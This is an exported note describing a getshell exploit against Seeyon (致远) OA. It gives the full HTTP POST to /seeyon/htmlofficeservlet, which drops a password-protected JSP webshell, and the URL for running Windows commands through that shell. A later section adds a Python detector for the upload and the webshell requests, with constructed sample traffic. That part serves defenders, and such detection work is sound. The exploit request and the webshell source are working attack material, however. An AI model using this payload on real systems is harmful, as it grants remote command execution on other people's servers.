<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="exporter-version" content="Evernote Mac 9.0.5 (458014)"/><meta name="altitude" content="1267.75341796875"/><meta name="author" content="その사랑"/><meta name="created" content="2019-06-26 09:05:38 +0000"/><meta name="latitude" content="26.64344787597656"/><meta name="longitude" content="106.6448012930872"/><meta name="source" content="desktop.mac"/><meta name="updated" content="2019-06-26 09:05:54 +0000"/><meta name="content-class" content="yinxiang.markdown"/><title>致远OA (Seeyon OA) getshell</title></head><body><div style="font-size: 14px; margin: 0; padding: 0; width: 100%;"><h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">Target host configuration</h3>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;">The target host is usually a Windows system; the webshell command used later (<code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">cmd /c whoami</code>) assumes a Windows shell.</p>
<h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">Request</h3>
<pre style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; margin: 2px 0 8px; background-color: #f5f7f8;"><code style="display: block; overflow-x: auto; background: #1e1e1e; line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; letter-spacing: -.3px; padding: 18px; color: #f4f4f4; white-space: pre-wrap;">POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1111
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ip:port
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
&lt;%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%&gt;&lt;%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %&gt;&lt;%if("123".equals(request.getParameter("pwd"))&amp;&amp;!"".equals(request.getParameter("cmd"))){out.println("&lt;pre&gt;"+excuteCmd(request.getParameter("cmd")) + "&lt;/pre&gt;");}else{out.println(":-)");}%&gt;6e4f045d4b8506bf492ada7e3390d7ce
</code></pre>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;"><img src="https://upload-images.jianshu.io/upload_images/5350990-26d7ea6d8915fb8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" style="line-height: 160%; margin: 4px 0 10px; box-sizing: border-box; vertical-align: top; max-width: 100%;"/></p>
<h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">Accessing the webshell</h3>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;"><code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">http://ip:port/seeyon/test123456.jsp?pwd=123&amp;cmd=cmd+/c+whoami</code><br/>
The <code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">pwd</code> value must equal the "123" hard-coded in the JSP above, and <code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">cmd</code> is passed unchanged to <code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">Runtime.getRuntime().exec()</code>, so any command the web server's account can run is accepted. The name test123456.jsp is what <code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6</code> decodes to; the encoding scheme is not known and is probably the OA's built-in one. The dropped file is then reachable under the <code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">/seeyon/</code> web root at the URL above.<br/>
<img src="https://upload-images.jianshu.io/upload_images/5350990-57d709f97f1ee087.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" style="line-height: 160%; margin: 4px 0 10px; box-sizing: border-box; vertical-align: top; max-width: 100%;"/></p>
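<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;">Detection logic for both stages of the technique above (the DBSTEP V3.0 upload to htmlofficeservlet carrying JSP source, and later hits on the dropped .jsp with pwd/cmd parameters), written as an added example for this note and not taken from the original post or from the OA product. It works on raw HTTP request text; the host 10.0.0.5:8080 and the three sample requests are constructed for the example. Because the FILENAME encoding is not known, the detector does not decode it and keys on the envelope format and the JSP markers instead.</p>

```python
"""Detect (1) a DBSTEP V3.0 upload to /seeyon/htmlofficeservlet that carries
JSP source and (2) later requests to a .jsp under /seeyon/ with a cmd
parameter. Added example; sample requests below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

UPLOAD_PATH = "/seeyon/htmlofficeservlet"
DBSTEP_MAGIC = "DBSTEP V3.0"
JSP_OPEN = re.compile(r"<%[@!=]?")          # JSP directive / declaration / scriptlet
KV_LINE = re.compile(r"^([A-Za-z]+)=(.*)$")  # KEY=value lines of the DBSTEP envelope


def split_request(raw: str):
    """Split raw request text into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def parse_dbstep_fields(body: str) -> dict:
    """Collect the KEY=value lines after the 'DBSTEP V3.0' header line.
    Values stay encoded. Stops at the first non KEY=value line, which is
    where the file content (here: JSP source) begins."""
    fields = {}
    for line in body.splitlines()[1:]:
        m = KV_LINE.match(line.strip())
        if not m:
            break
        fields[m.group(1)] = m.group(2)
    return fields


def detect_upload(raw: str):
    """Stage 1: DBSTEP upload to htmlofficeservlet. Returns a finding or None."""
    method, target, _headers, body = split_request(raw)
    if method != "POST" or urlsplit(target).path != UPLOAD_PATH:
        return None
    if not body.lstrip().startswith(DBSTEP_MAGIC):
        return None
    fields = parse_dbstep_fields(body)
    jsp_payload = JSP_OPEN.search(body) is not None
    return {
        "stage": "upload",
        "filename_field": fields.get("FILENAME"),  # still encoded
        "jsp_payload": jsp_payload,
        "severity": "critical" if jsp_payload else "suspicious",
    }


def detect_webshell_hit(raw: str):
    """Stage 2: a .jsp under /seeyon/ requested with a cmd parameter in the
    query string or a form body. Returns a finding or None."""
    method, target, headers, body = split_request(raw)
    url = urlsplit(target)
    if not (url.path.startswith("/seeyon/") and url.path.endswith(".jsp")):
        return None
    params = parse_qs(url.query)
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        params.update(parse_qs(body))
    if "cmd" not in params:
        return None
    return {"stage": "execute", "path": url.path,
            "cmd": params["cmd"][0], "has_pwd": "pwd" in params}


def scan(requests):
    """Run both detectors over raw requests; return the findings in order."""
    findings = []
    for raw in requests:
        for detector in (detect_upload, detect_webshell_hit):
            hit = detector(raw)
            if hit:
                findings.append(hit)
    return findings


# Constructed samples modelled on the request and URL in this note.
UPLOAD_REQ = (
    "POST /seeyon/htmlofficeservlet HTTP/1.1\r\n"
    "Host: 10.0.0.5:8080\r\n\r\n"
    "DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV\n"
    "OPTION=S3WYOSWLBSGr\n"
    "FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6\n"
    "needReadFile=yRWZdAS6\n"
    '<%@ page language="java" %><% out.println(":-)"); %>'
)
SHELL_REQ = ("GET /seeyon/test123456.jsp?pwd=123&cmd=cmd+/c+whoami HTTP/1.1\r\n"
             "Host: 10.0.0.5:8080\r\n\r\n")
BENIGN_REQ = "GET /seeyon/main.do HTTP/1.1\r\nHost: 10.0.0.5:8080\r\n\r\n"

if __name__ == "__main__":
    for finding in scan([UPLOAD_REQ, SHELL_REQ, BENIGN_REQ]):
        print(finding)
```

<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;">Run as a script it prints one finding for the upload (severity critical because JSP markers follow the envelope) and one for the test123456.jsp hit, and nothing for the benign request. The upload rule is deliberately split into "envelope present" and "JSP source present" so that legitimate htmlofficeservlet traffic, which also starts with DBSTEP V3.0, is only flagged as suspicious rather than critical.</p>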
</div></body></html>